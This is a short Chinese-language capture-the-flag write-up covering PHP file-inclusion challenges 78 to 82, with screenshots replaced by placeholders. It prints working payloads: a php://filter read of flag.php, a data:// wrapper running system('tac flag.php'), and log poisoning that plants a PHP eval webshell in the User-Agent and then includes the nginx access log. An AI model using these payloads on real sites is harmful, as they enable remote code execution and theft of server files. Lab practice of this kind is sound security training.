第78题-第83题

第78题

image.png
直接file=php://filter/read=convert.base64-encode/resource=flag.php,然后命令行解密
image.png

或者使用data伪协议
image.png

image.png

第79题

可以使用短标签绕过
file=data://text/plain,<?=system('tac flag.php');?>

image.png

或者base64编码一下也可以
image.png

第80题

日志投毒,没啥好说的
ua改成Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0<?php @eval($_POST['cmd']); ?>

payload改成?file=/var/log/nginx/access.log&2=phpinfo();

结束
image.png

最后我结合蚁剑

image.png

第81题

image.png

依旧日志包含

第82题